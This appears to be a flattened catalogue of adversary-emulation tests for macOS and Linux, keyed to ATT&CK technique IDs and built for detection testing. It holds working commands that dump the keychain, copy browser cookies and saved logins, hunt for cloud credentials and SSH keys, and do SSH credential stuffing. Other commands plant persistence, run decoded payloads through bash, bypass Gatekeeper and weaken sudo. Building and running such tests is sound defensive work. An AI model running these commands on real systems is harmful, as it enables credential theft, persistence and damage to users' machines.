Enable traffic redirection on macOS UI (not terminal). The test will modify and enable the "Web Proxy" and "Secure Web Proxy" settings in System Preferences => Network => Advanced => Proxies for the specified network interface. Note that this test may conflict with pre-existing system configuration.
networksetup -setwebproxy #{interface} #{proxy_server} #{proxy_port}
networksetup -setsecurewebproxy #{interface} #{proxy_server} #{proxy_port}
Multi-hop Proxy
This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality. Upon successful execution, the tor proxy service will be launched.
osascript -e 'tell application "Terminal" to do script "tor"'
T1098.004
sh
linux, macos
Modify SSH Authorized Keys
SSH Authorized Keys
Modify contents of <user-home>/.ssh/authorized_keys to maintain persistence on victim host. If the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.
if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat ~/.ssh/authorized_keys); echo "$ssh_authorized_keys" > ~/.ssh/authorized_keys; fi;
T1105
sh
elevated
linux, macos
rsync remote file copy (push)
Ingress Tool Transfer
Utilize rsync to perform a remote file copy (push)
rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
T1105
sh
linux, macos
rsync remote file copy (pull)
Ingress Tool Transfer
Utilize rsync to perform a remote file copy (pull)
rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
T1105
sh
linux, macos
scp remote file copy (push)
Ingress Tool Transfer
Utilize scp to perform a remote file copy (push)
scp #{local_file} #{username}@#{remote_host}:#{remote_path}
T1105
sh
linux, macos
scp remote file copy (pull)
Ingress Tool Transfer
Utilize scp to perform a remote file copy (pull)
scp #{username}@#{remote_host}:#{remote_file} #{local_path}
T1105
bash
linux, macos
sftp remote file copy (push)
Ingress Tool Transfer
Utilize sftp to perform a remote file copy (push)
sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
T1105
sh
linux, macos
sftp remote file copy (pull)
Ingress Tool Transfer
Utilize sftp to perform a remote file copy (pull)
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
T1105
sh
linux, macos
whois file download
Ingress Tool Transfer
Download a remote file using the whois utility
timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}
T1105
sh
macos
File download via nscurl
Ingress Tool Transfer
Use nscurl to download and write a file/payload from the internet. -k = Disable certificate checking -o = Output destination
nscurl -k "#{remote_file}" -o "#{destination_path}"
T1110.004
bash
macos
SSH Credential Stuffing From MacOS
Credential Stuffing
Using username,password combination from a password dump to login over SSH.
cp "$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt" /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
T1113
bash
macos
Screencapture
Screen Capture
Use screencapture command to collect a full desktop screenshot
screencapture #{output_file}
T1113
bash
macos
Screencapture (silent)
Screen Capture
Use screencapture command to collect a full desktop screenshot
screencapture -x #{output_file}
T1115
bash
macos
Execute commands from clipboard
Clipboard Data
Echo a command to clipboard and execute it
echo ifconfig | pbcopy
$(pbpaste)
T1123
sh
macos
using Quicktime Player
Audio Capture
Use AppleScript to get Quicktime Player to record an audio file from the default microphone. Should create a non-empty m4a file with sound from the microphone. - requires Automation permissions but no additional microphone permissions - saves file in /tmp by default. Other locations likely to require more permissions.
sh #{filename} #{audiofile} #{duration}
T1124
sh
linux, macos
System Time Discovery in FreeBSD/macOS
System Time Discovery
Identify system time. Upon execution, the local computer system time and timezone will be displayed.
date
T1132.001
sh
macos, linux
Base64 Encoded data.
Standard Encoding
Utilizing a common technique for posting base64 encoded data.
echo -n 111-11-1111 | base64
curl -XPOST #{base64_data}.#{destination_url}
T1135
sh
macos
Network Share Discovery
Network Share Discovery
Network Share Discovery
df -aH
smbutil view -g //#{computer_name}
showmount #{computer_name}
T1136.001
bash
elevated
macos
Create a user account on a MacOS system
Local Account
Creates a user on a MacOS system with dscl
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/zsh
dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
T1140
sh
linux, macos
Base64 decoding with Python
Deobfuscate/Decode Files or Information
Use Python to decode a base64-encoded text string and echo it to the console
ENCODED=$(python3 -c 'import base64;enc=base64.b64encode("#{message}".encode());print(enc.decode())')
python3 -c "import base64;dec=base64.b64decode(\"$ENCODED\");print(dec.decode())"
python3 -c "import base64 as d;dec=d.b64decode(\"$ENCODED\");print(dec.decode())"
python3 -c "from base64 import b64decode;dec=b64decode(\"$ENCODED\");print(dec.decode())"
python3 -c "from base64 import b64decode as d;dec=d(\"$ENCODED\");print(dec.decode())"
echo $ENCODED | python3 -c "import base64,sys;dec=base64.b64decode(sys.stdin.read());print(dec.decode())"
echo $ENCODED > #{encoded_file} && python3 -c "import base64;dec=base64.b64decode(open('#{encoded_file}').read());print(dec.decode())"
T1140
sh
linux, macos
Base64 decoding with Perl
Deobfuscate/Decode Files or Information
Use Perl to decode a base64-encoded text string and echo it to the console
ENCODED=$(perl -e "use MIME::Base64;print(encode_base64('#{message}'));")
perl -le "use MIME::Base64;print(decode_base64('$ENCODED'));"
echo $ENCODED | perl -le 'use MIME::Base64;print(decode_base64(<STDIN>));'
echo $ENCODED > #{encoded_file} && perl -le 'use MIME::Base64;open($f,"<","#{encoded_file}");print(decode_base64(<$f>));'
T1140
sh
linux, macos
Base64 decoding with shell utilities
Deobfuscate/Decode Files or Information
Use common shell utilities to decode a base64-encoded text string and echo it to the console
ENCODED=$(echo '#{message}' | base64)
printf $ENCODED | base64 -d
echo $ENCODED | base64 -d
echo $(echo $ENCODED) | base64 -d
echo $ENCODED > #{encoded_file} && base64 -d #{encoded_file}
echo $ENCODED > #{encoded_file} && base64 -d < #{encoded_file}
echo $ENCODED > #{encoded_file} && cat #{encoded_file} | base64 -d
echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | base64 -d
bash -c "{echo,\"$(echo $ENCODED)\"}|{base64,-d}"
T1140
sh
linux, macos
Hex decoding with shell utilities
Deobfuscate/Decode Files or Information
Use common shell utilities to decode a hex-encoded text string and echo it to the console
ENCODED=$(echo '#{message}' | xxd -ps -c 256)
printf $ENCODED | xxd -r -p
echo $ENCODED | xxd -r -p
echo $(echo $ENCODED) | xxd -r -p
echo $ENCODED > #{encoded_file} && xxd -r -p #{encoded_file}
echo $ENCODED > #{encoded_file} && xxd -r -p < #{encoded_file}
echo $ENCODED > #{encoded_file} && cat #{encoded_file} | xxd -r -p
echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | xxd -r -p
T1140
sh
linux, macos
Linux Base64 Encoded Shebang in CLI
Deobfuscate/Decode Files or Information
Using Linux Base64 Encoded shell scripts that have Shebang in them. This is commonly how attackers obfuscate passing and executing a shell script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html) by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml) for it.
echo #{bash_encoded} | base64 -d | bash
echo #{dash_encoded} | base64 -d | bash
echo #{fish_encoded} | base64 -d | bash
echo #{sh_encoded} | base64 -d | bash
T1140
bash
linux, macos
XOR decoding and command execution using Python
Deobfuscate/Decode Files or Information
An adversary can obfuscate malicious commands or payloads using XOR and execute them on the victim's machine. This test uses Python to decode and execute commands on the machine.
python3 -c 'import base64; import subprocess; xor_decrypt = lambda text, key: "".join([chr(c ^ ord(k)) for c, k in zip(base64.b64decode(text.encode()), key)]); command = "#{encrypted_command}"; key = "#{xor_key}"; exec = xor_decrypt(command, key); subprocess.call(exec, shell=True)'
T1176
manual
linux, windows, macos
Chrome/Chromium (Developer Mode)
Software Extensions
Turn on Chrome/Chromium developer mode and Load Extension found in the src directory
T1176
manual
linux, windows, macos
Firefox
Software Extensions
Create a file called test.wma, with the duration of 30 seconds
T1176
manual
windows, macos
Edge Chromium Addon - VPN
Software Extensions
Adversaries may use VPN extensions in an attempt to hide traffic sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store.
T1201
bash
macos
Examine password policy - macOS
Password Policy Discovery
Lists the password policy to console on macOS.
pwpolicy getaccountpolicies
T1217
sh
macos
List Mozilla Firefox Bookmark Database Files on macOS
Browser Information Discovery
Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file.
find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} >> #{output_file} \;
cat #{output_file} 2>/dev/null
T1217
sh
macos
List Google Chrome Bookmark JSON Files on macOS
Browser Information Discovery
Searches for Google Chrome's Bookmark file (on macOS) that contains bookmarks in JSON format and lists any found instances to a text file.
find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >> #{output_file} \;
cat #{output_file} 2>/dev/null
T1217
sh
macos
List Safari Bookmarks on MacOS
Browser Information Discovery
This test searches for Safari's Bookmarks file (on macOS) and lists any found instances to a text file.
find / -path "*/Safari/Bookmarks.plist" 2>/dev/null >> #{output_file}
cat #{output_file}
T1222.002
sh
linux, macos
chmod - Change file or folder mode (numeric mode)
Linux and Mac Permissions
Changes a file or folder's permissions using chmod and a specified numeric mode.
chmod #{numeric_mode} #{file_or_folder}
T1222.002
sh
linux, macos
chmod - Change file or folder mode (symbolic mode)
Linux and Mac Permissions
Changes a file or folder's permissions using chmod and a specified symbolic mode.
chmod #{symbolic_mode} #{file_or_folder}
T1222.002
sh
linux, macos
chmod - Change file or folder mode (numeric mode) recursively
Linux and Mac Permissions
Changes a file or folder's permissions recursively using chmod and a specified numeric mode.
chmod -R #{numeric_mode} #{file_or_folder}
T1222.002
bash
linux, macos
chmod - Change file or folder mode (symbolic mode) recursively
Linux and Mac Permissions
Changes a file or folder's permissions recursively using chmod and a specified symbolic mode.
chmod -R #{symbolic_mode} #{file_or_folder}
T1222.002
bash
macos, linux
chown - Change file or folder ownership and group
Linux and Mac Permissions
Changes a file or folder's ownership and group information using chown.
chown #{owner}:#{group} #{file_or_folder}
T1222.002
bash
macos, linux
chown - Change file or folder ownership and group recursively
Linux and Mac Permissions
Changes a file or folder's ownership and group information recursively using chown.
chown -R #{owner}:#{group} #{file_or_folder}
T1222.002
sh
linux, macos
chown - Change file or folder mode ownership only
Linux and Mac Permissions
Changes a file or folder's ownership only using chown.
chown #{owner} #{file_or_folder}
T1222.002
bash
macos, linux
chown - Change file or folder ownership recursively
Linux and Mac Permissions
Changes a file or folder's ownership only recursively using chown.
chown -R #{owner} #{file_or_folder}
T1222.002
sh
macos, linux
chattr - Remove immutable file attribute
Linux and Mac Permissions
Remove's a file's immutable attribute using chattr. This technique was used by the threat actor Rocke during the compromise of Linux web servers.
chattr -i #{file_to_modify}
T1222.002
sh
macos, linux
Chmod through c script
Linux and Mac Permissions
chmods a file using a c script
#{compiled_file} /tmp/ T1222002
T1222.002
sh
elevated
macos, linux
Chown through c script
Linux and Mac Permissions
chowns a file to root using a c script
sudo #{compiled_file} #{source_file}
T1485
sh
linux, macos
FreeBSD/macOS/Linux - Overwrite file with DD
Data Destruction
Overwrites and deletes a file using DD. To stop the test, break the command with CTRL/CMD+C.
dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk '{print $5}') iflag=count_bytes
T1486
sh
macos
Encrypt files using 7z utility - macOS
Data Encrypted for Impact
This test encrypts the file(s) using the 7z utility
7z a -p #{file_password} -mhe=on #{encrypted_file_name} #{input_file_path}
T1486
sh
macos
Encrypt files using openssl utility - macOS
Data Encrypted for Impact
This test encrypts the file(s) using the openssl utility
openssl enc #{encryption_option} -in #{input_file_path} -out #{output_file_name}
T1490
sh
elevated
macos
Disable Time Machine
Inhibit System Recovery
Disables Time Machine which is Apple's automated backup utility software. Attackers can use this to prevent backups from occurring and hinder the victim's ability to recover from any damage.
sudo tmutil disable
T1496
sh
linux, macos
FreeBSD/macOS/Linux - Simulate CPU Load with Yes
Resource Hijacking
This test simulates a high CPU load as you might observe during cryptojacking attacks. End the test by using CTRL/CMD+C to break.
yes > /dev/null
T1497.001
sh
macos
Detect Virtualization Environment via ioreg
System Checks
ioreg contains registry entries for all the device drivers in the system. If it's a virtual machine, one of the device manufacturer will be a Virtualization Software.
if (ioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo 'Virtualization Environment detected'; fi;
T1497.001
sh
macos
Detect Virtualization Environment using sysctl (hw.model)
System Checks
sysctl hw.model will return the model name of the hardware(Macmini8,1, MacBookAir10,1, etc.) in case of native Apple hardware but will return the hypervisor name (VMware7,0). Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#hardware-model
if [ "$(sysctl -n hw.model | grep -v 'Mac')" != "" ]; then echo 'Virtualization Environment detected'; fi;
T1497.001
sh
macos
Check if System Integrity Protection is enabled
System Checks
The latest versions of macOS have the System Integrity Protection feature (SIP). If a sandbox uses a non-signed kernel extension for monitoring purposes the, SIP feature must be disabled to load this kind of kernel extension. Malware may check if the SIP is enabled. Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#sip
if [ "$(csrutil status | grep -v 'enabled')" != "" ]; then echo 'Possible Virtualization Environment detected'; fi;
T1497.001
sh
macos
Detect Virtualization Environment using system_profiler
System Checks
system_profiler provides system hardware and software configuration and the Model Identifier should provide the value similar to (sysctl -n hw.model). We should be able to find whether virtualization is enabled by checking whether the Model Identifier does not contain "Mac".
if [ "$(system_profiler SPHardwareDataType | grep "Model Identifier" | grep -v 'Mac')" != "" ]; then echo 'Virtualization Environment detected'; fi;
T1497.003
sh
linux, macos
Delay execution with ping
Time Based Checks
Uses the ping command to introduce a delay before executing a malicious payload.
ping -c #{ping_count} 8.8.8.8 > /dev/null
#{evil_command}
T1518
sh
macos
Find and Display Safari Browser Version
Software Discovery
Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors
/usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
/usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist
T1518.001
sh
macos
Security Software Discovery - ps (macOS)
Security Software Discovery
Methods to identify Security Software on an endpoint when sucessfully executed, command shell is going to display AV/Security software it is running.
ps aux | egrep 'Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'
T1529
sh
elevated
linux, macos
Restart System via `shutdown` - FreeBSD/macOS/Linux
System Shutdown/Reboot
This test restarts a FreeBSD/macOS/Linux system.
shutdown -r #{timeout}
T1529
sh
elevated
linux, macos
Shutdown System via `shutdown` - FreeBSD/macOS/Linux
System Shutdown/Reboot
This test shuts down a FreeBSD/macOS/Linux system using a halt.
shutdown -h #{timeout}
T1529
sh
elevated
linux, macos
Restart System via `reboot` - FreeBSD/macOS/Linux
System Shutdown/Reboot
This test restarts a FreeBSD/macOS/Linux system via reboot.
reboot
T1531
sh
elevated
macos, linux
Change User Password via passwd
Account Access Removal
This test changes the user password to hinder access to the account using passwd utility.
passwd #{user_account} #enter admin password > enter new password > confirm new password
T1531
sh
elevated
macos
Delete User via dscl utility
Account Access Removal
This test deletes the user account using the dscl utility.
dscl . -delete /Users/#{user_account} #enter admin password
T1531
sh
elevated
macos
Delete User via sysadminctl utility
Account Access Removal
This test deletes the user account using the sysadminctl utility.
sysadminctl -deleteUser #{user_account} #enter admin password
T1539
bash
macos
Steal Chrome Cookies via Remote Debugging (Mac)
Steal Web Session Cookie
The remote debugging functionality in Chrome can be used by malware for post-exploitation activities to obtain cookies without requiring keychain access. By initiating Chrome with a remote debug port, an attacker can sidestep encryption and employ Chrome's own mechanisms to access cookies. If successful, this test will output a list of cookies. Note: Chrome processes will be killed during this test. See https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e
killall 'Google Chrome'
sleep 1
open -a "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --args --remote-debugging-port=1337 --remote-allow-origins=http://localhost/
sleep 1
/tmp/WhiteChocolateMacademiaNut/chocolate -d cookies -p 1337
T1539
sh
macos
Copy Safari BinaryCookies files using AppleScript
Steal Web Session Cookie
This command will copy Safari BinaryCookies files using AppleScript as seen in Atomic Stealer.
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")' -e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing' -e 'end tell'
Launch Agent
Create a plist and execute it
if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi;
sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename}
sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename}
T1543.001
bash
elevated
macos
Event Monitor Daemon Persistence
Launch Agent
This test adds persistence via a plist to execute via the macOS Event Monitor Daemon.
sudo cp #{script_location} #{script_destination}
sudo touch /private/var/db/emondClients/#{empty_file}
T1543.001
bash
elevated
macos
Launch Agent - Root Directory
Launch Agent
Create a plist and execute it
sudo cp #{path_malicious_plist} /Library/LaunchAgents/#{plist_filename}
launchctl load -w /Library/LaunchAgents/#{plist_filename}
Launch Daemon
Utilize LaunchDaemon to launch Hello World
sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
T1546.004
sh
macos, linux
Add command to .bash_profile
Unix Shell Configuration Modification
Adds a command to the .bash_profile file of the current user
echo '#{command_to_add}' >> ~/.bash_profile
T1546.004
sh
macos, linux
Add command to .bashrc
Unix Shell Configuration Modification
Adds a command to the .bashrc file of the current user
echo '#{command_to_add}' >> ~/.bashrc
Trap
Launch bash shell with command arg to create TRAP on EXIT. The trap executes script that writes to /tmp/art-fish.txt
bash -c 'trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" EXIT'
Trap
Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal. The trap executes script that writes to /tmp/art-fish.txt
bash -c 'trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" SIGINT && kill -SIGINT $$'
T1546.014
sh
elevated
macos
Persistance with Event Monitor - emond
Emond
Establish persistence via a rule run by OSX's emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
sudo cp "#{plist}" /etc/emond.d/rules/T1546.014_emond.plist
sudo touch /private/var/db/emondClients/T1546.014
T1546.018
sh
macos
Python Startup Hook - atomic_hook.pth (macOS)
Python Startup Hooks
Creates a Python startup hook using a .pth file inside a virtual environment on macOS.
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XX)
echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
$PYTHON_EXE -m venv "$TEMPDIR/env"
SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
echo "import subprocess; subprocess.Popen(['open', '-a', '#{exe_name}'])" > "$SITE_PACKAGES/atomic_hook.pth"
"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
T1546.018
sh
linux, macos
Python Startup Hook - usercustomize.py (Linux / MacOS)
Python Startup Hooks
Executes code via usercustomize.py. This is a per-user persistence mechanism that does not require root privileges.
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
mkdir -p "$USER_PACKAGES"
echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
$PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
T1547.006
bash
elevated
macos
MacOS - Load Kernel Module via kextload and kmutil
Kernel Modules and Extensions
This test uses the kextload and kmutil commands to load and unload a MacOS kernel module.
set -x
sudo kextload #{module_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kextunload #{module_path}
sudo kmutil load -p #{module_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kmutil unload -p #{module_path}
T1547.006
bash
elevated
macos
MacOS - Load Kernel Module via KextManagerLoadKextWithURL()
Kernel Modules and Extensions
This test uses the IOKit API to load a kernel module for macOS. Harcoded to use SoftRAID kext
sudo #{exe_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kextunload /Library/Extensions/SoftRAID.kext
T1547.007
sh
macos
Copy in loginwindow.plist for Re-Opened Applications
Re-opened Applications
Copy in new loginwindow.plist to launch Calculator.
cp #{calc_plist_path} ~/Library/Preferences/ByHost/com.apple.loginwindow.plist
T1547.007
sh
elevated
macos
Re-Opened Applications using LoginHook
Re-opened Applications
Mac Defaults [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html)
sudo defaults write com.apple.loginwindow LoginHook #{script}
T1547.007
sh
macos
Append to existing loginwindow for Re-Opened Applications
Re-opened Applications
Appends an entry to launch Calculator hidden loginwindow.*.plist for next login. Note that the change may not result in the added Calculator program launching on next user login. It may depend on which version of macOS you are running on.
FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1`
if [ -z "${FILE}" ] ; then echo "No loginwindow plist file found" && exit 1 ; fi
echo save backup copy to /tmp/
cp ${FILE} /tmp/t1547007_loginwindow-backup.plist
echo before
plutil -p ${FILE}
echo overwriting...
#{exe_path} ${FILE} && echo after && plutil -p ${FILE}
T1547.015
bash
macos
Add macOS LoginItem using Applescript
Login Items
Runs osascript on a file to create new LoginItem for current user. NOTE: Will popup dialog prompting user to Allow or Deny Terminal.app to control "System Events" Therefore, it can't be automated until the TCC is granted. The login item launches Safari.app when user logs in, but there is a cleanup script to remove it as well. In addition to the osascript Process Events, file modification events to /Users/*/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm should be seen.
osascript #{scriptfile}
T1548.001
sh
elevated
macos, linux
Make and modify binary from C source
Setuid and Setgid
Make, change owner, and change file attributes on a C source code file
cp #{payload} /tmp/hello.c
sudo chown root /tmp/hello.c
sudo make /tmp/hello
sudo chown root /tmp/hello
sudo chmod u+s /tmp/hello
/tmp/hello
T1548.001
sh
elevated
macos, linux
Set a SetUID flag on file
Setuid and Setgid
This test sets the SetUID flag on a file in FreeBSD.
sudo touch #{file_to_setuid}
sudo chown root #{file_to_setuid}
sudo chmod u+xs #{file_to_setuid}
T1548.001
sh
elevated
macos, linux
Set a SetGID flag on file
Setuid and Setgid
This test sets the SetGID flag on a file in Linux and macOS.
sudo touch #{file_to_setuid}
sudo chown root #{file_to_setuid}
sudo chmod g+xs #{file_to_setuid}
T1548.003
sh
elevated
macos, linux
Sudo usage
Sudo and Sudo Caching
Common Sudo enumeration methods.
sudo -l
sudo cat /etc/sudoers
sudo vim /etc/sudoers
T1548.003
sh
elevated
macos, linux
Unlimited sudo cache timeout
Sudo and Sudo Caching
Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
sudo visudo -c -f /etc/sudoers
T1548.003
sh
elevated
macos, linux
Disable tty_tickets for sudo caching
Sudo and Sudo Caching
Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.
sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
sudo visudo -c -f /etc/sudoers
T1552
sh
linux, macos, iaas:aws
AWS - Retrieve EC2 Password Data using stratus
Unsecured Credentials
This atomic runs an API call GetPasswordData from a role that does not have permission to do so. This simulates an attacker attempting to retrieve RDP passwords on a high number of Windows EC2 instances. This atomic test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.credential-access.ec2-get-password-data/
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.credential-access.ec2-get-password-data
echo "starting detonate"
./stratus detonate aws.credential-access.ec2-get-password-data --force
T1552.001
sh
macos, linux
Find AWS credentials
Credentials In Files
Find local AWS credentials from file, defaults to using / as the look path.
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001
bash
elevated
macos
Extract Browser and System credentials with LaZagne
Credentials In Files
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
python2 laZagne.py all
T1552.001
sh
linux, macos
Extract passwords with grep
Credentials In Files
Extracting credentials from files
grep -ri password #{file_path}
exit 0
T1552.001
bash
linux, macos
Find and Access Github Credentials
Credentials In Files
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001
sh
macos, linux
Find Azure credentials
Credentials In Files
Find local Azure credentials from file, defaults to using / as the look path.
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001
sh
macos, linux
Find GCP credentials
Credentials In Files
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001
sh
macos, linux
Find OCI credentials
Credentials In Files
Find local Oracle cloud credentials from file, defaults to using / as the look path.
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.003
sh
linux, macos
Search Through Bash History
Shell History
Search through bash history for specifice commands we want to capture
cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
T1552.004
sh
linux, macos
Discover Private SSH Keys
Private Keys
Discover private SSH keys on a FreeBSD, macOS or Linux system.
find #{search_path} -name id_rsa 2>/dev/null >> #{output_file}
exit 0
T1552.004
sh
macos, linux
Copy Private SSH Keys with rsync
Private Keys
Copy private SSH keys on a Linux or macOS system to a staging folder using the rsync command.
mkdir #{output_folder}
find #{search_path} -name id_rsa 2>/dev/null -exec rsync -R {} #{output_folder} \;
exit 0
T1552.004
sh
macos, linux
Copy the users GnuPG directory with rsync
Private Keys
Copy the users GnuPG (.gnupg) directory on a Mac or Linux system to a staging folder using the rsync command.
mkdir #{output_folder}
find #{search_path} -type d -name '.gnupg' 2>/dev/null -exec rsync -Rr {} #{output_folder} \;
exit 0
Gatekeeper Bypass
Gatekeeper Bypass via command line
xattr -d com.apple.quarantine #{app_path}
T1553.004
sh
elevated
macos
Install root CA on macOS
Install Root Certificate
Creates a root CA with openssl
sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}"
Keychain
This command will dump keychain credential information from login.keychain. Source: https://www.loobins.io/binaries/security/ ### Keychain File path ~/Library/Keychains/ /Library/Keychains/ /Network/Library/Keychains/ [Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html)
sudo security dump-keychain -d login.keychain
T1555.001
sh
macos
Export Certificate Item(s)
Keychain
This command finds all certificate items and sends the output to local file in pem format.
security find-certificate -a -p > #{cert_export}
T1555.001
sh
macos
Import Certificate Item(s) into Keychain
Keychain
This command will import a certificate pem file into a keychain.
security import #{cert_export} -k
T1555.001
sh
macos
Copy Keychain using cat utility
Keychain
This command will copy the keychain using the cat utility in a manner similar to Atomic Stealer.
cat ~/Library/Keychains/login.keychain-db > #{keychain_export}
T1555.003
sh
macos
Search macOS Safari Cookies
Credentials from Web Browsers
This test uses grep to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware. Upon successful execution, MacOS shell will cd to ~/Libraries/Cookies and grep for Cookies.binarycookies.
cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"
T1555.003
sh
macos
Simulating Access to Chrome Login Data - MacOS
Credentials from Web Browsers
This test locates the Login Data files used by Chrome to store encrypted credentials, then copies them to the temp directory for later exfil. Once the files are exfiltrated, malware like CookieMiner could be used to perform credential extraction. See https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ .
cp ~/Library/"Application Support/Google/Chrome/Default/Login Data" "/tmp/T1555.003_Login Data"
cp ~/Library/"Application Support/Google/Chrome/Default/Login Data For Account" "/tmp/T1555.003_Login Data For Account"
T1560.001
bash
elevated
linux, macos
Data Compressed - nix - zip
Archive via Utility
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression.
zip #{output_file} #{input_files}
T1560.001
sh
linux, macos
Data Compressed - nix - gzip Single File
Archive via Utility
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
test -e #{input_file} && gzip -k #{input_file} || (echo '#{input_content}' >> #{input_file}; gzip -k #{input_file})
T1560.001
sh
linux, macos
Data Compressed - nix - tar Folder or File
Archive via Utility
